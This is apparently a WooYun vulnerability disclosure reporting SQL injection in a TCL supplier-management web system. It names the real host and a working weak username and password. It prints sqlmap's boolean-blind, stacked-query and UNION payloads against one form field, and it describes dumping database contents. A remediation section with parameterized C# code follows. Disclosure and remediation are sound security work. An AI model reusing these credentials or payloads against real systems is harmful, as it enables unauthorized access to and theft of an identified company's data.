WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
2015-12-15: Details reported to the vendor, awaiting vendor response
2015-12-15: Vendor confirmed; details disclosed to the vendor only
2015-12-25: Details disclosed to core white hats and relevant domain experts
2016-01-04: Details disclosed to regular white hats
2016-01-14: Details disclosed to intern white hats
2016-01-28: Details disclosed to the public
As per the title.
System: http://vmi.tclking.com/ Weak credentials: 100055 123456. After logging in, I found a SQL injection in one of the query functions.
Vulnerability location:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=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&__VIEWSTATEGENERATOR=5E109024&__EVENTVALIDATION=/wEWCALp2dChAgLD2vjTBwLWoOLpAgKF+878DALD5bnqCgLDlPiHCwLPlry/BQLTgfvCCkTih6mBYrW8Yvj4JFd+zc2kHXR+&txtBukrs=0702' AND 2611=2611 AND 'tcFj'='tcFj&txtWerks=&txtMon=&chkUnConfirmed=on&chkConfirmed=on&BtnQuery= %E6%8F%90 %E4%BA%A4

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=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&__VIEWSTATEGENERATOR=5E109024&__EVENTVALIDATION=/wEWCALp2dChAgLD2vjTBwLWoOLpAgKF+878DALD5bnqCgLDlPiHCwLPlry/BQLTgfvCCkTih6mBYrW8Yvj4JFd+zc2kHXR+&txtBukrs=0702';WAITFOR DELAY '0:0:5'--&txtWerks=&txtMon=&chkUnConfirmed=on&chkConfirmed=on&BtnQuery= %E6%8F%90 %E4%BA%A4

    Type: UNION query
    Title: Generic UNION query (NULL) - 19 columns
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=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&__VIEWSTATEGENERATOR=5E109024&__EVENTVALIDATION=/wEWCALp2dChAgLD2vjTBwLWoOLpAgKF+878DALD5bnqCgLDlPiHCwLPlry/BQLTgfvCCkTih6mBYrW8Yvj4JFd+zc2kHXR+&txtBukrs=0702' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113) CHAR(122) CHAR(118) CHAR(120) CHAR(113) CHAR(75) CHAR(67) CHAR(97) CHAR(86) CHAR(73) CHAR(107) CHAR(116) CHAR(120) CHAR(67) CHAR(75) CHAR(89) CHAR(104) CHAR(84) CHAR(103) CHAR(82) CHAR(73) CHAR(107) CHAR(118) CHAR(116) CHAR(113) CHAR(72) CHAR(119) CHAR(109) CHAR(87) CHAR(86) CHAR(105) CHAR(99) CHAR(67) CHAR(99) CHAR(85) CHAR(120) CHAR(70) CHAR(114) CHAR(74) CHAR(107) CHAR(116) CHAR(89) CHAR(74) CHAR(114) CHAR(98) CHAR(113) CHAR(120) CHAR(112) CHAR(122) CHAR(113),NULL,NULL,NULL,NULL,NULL-- &txtWerks=&txtMon=&chkUnConfirmed=on&chkConfirmed=on&BtnQuery= %E6%8F%90 %E4%BA%A4
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
Databases:
A large amount of data; the network became unstable later on and the dump ran too slowly, so I stopped.
Finally, shamelessly asking for a high rank, please be kind =_=
Change the weak password, and have the internal system self-checked for injection.
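As a remediation sketch for the fix suggested above, added here and not taken from the report or from the TCL system: a hypothetical ASP.NET 2.0 code-behind showing the string-building pattern that makes the boolean-blind, stacked and UNION payloads quoted above possible, beside a parameterized version. Only the form field names txtBukrs/txtWerks/txtMon come from the report; the class, table and connection-string names are assumptions.

```csharp
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;

// Hypothetical ASP.NET 2.0 code-behind for the query page; every name except the
// form fields txtBukrs/txtWerks/txtMon is assumed, not the vendor's code.
public partial class QueryPage : System.Web.UI.Page
{
    // Before: form values are spliced into the SQL text, so a closing quote in
    // txtBukrs ends the literal and the rest of the input runs as T-SQL.
    private DataTable QueryUnsafe(string bukrs, string werks, string mon)
    {
        string sql = "SELECT * FROM dbo.PlanTable WHERE bukrs = '" + bukrs
                   + "' AND werks = '" + werks + "' AND mon = '" + mon + "'";
        return Run(new SqlCommand(sql));
    }

    // After: the statement text is constant and the values travel as typed
    // parameters, so SQL Server never parses user input as part of the query.
    private DataTable QuerySafe(string bukrs, string werks, string mon)
    {
        const string sql = "SELECT * FROM dbo.PlanTable "
                         + "WHERE bukrs = @bukrs AND werks = @werks AND mon = @mon";
        SqlCommand cmd = new SqlCommand(sql);
        cmd.Parameters.Add("@bukrs", SqlDbType.VarChar, 4).Value = bukrs;
        cmd.Parameters.Add("@werks", SqlDbType.VarChar, 4).Value = werks;
        cmd.Parameters.Add("@mon", SqlDbType.VarChar, 6).Value = mon;
        return Run(cmd);
    }

    private static DataTable Run(SqlCommand cmd)
    {
        // Connection-string name is assumed. The login behind it should hold only
        // SELECT on the tables this page needs, so that a future injection still
        // cannot read master or run stacked statements such as WAITFOR DELAY.
        string cs = ConfigurationManager.ConnectionStrings["VmiDb"].ConnectionString;
        using (SqlConnection conn = new SqlConnection(cs))
        using (cmd)
        {
            cmd.Connection = conn;
            conn.Open();
            DataTable table = new DataTable();
            using (SqlDataReader reader = cmd.ExecuteReader()) { table.Load(reader); }
            return table;
        }
    }
}
```

The button handler would call QuerySafe(txtBukrs.Text, txtWerks.Text, txtMon.Text) and bind the result; QueryUnsafe is kept only to show the pattern to search for during the self-check.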
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-12-15 17:09
Thank you for your attention to TCL, thanks!
None yet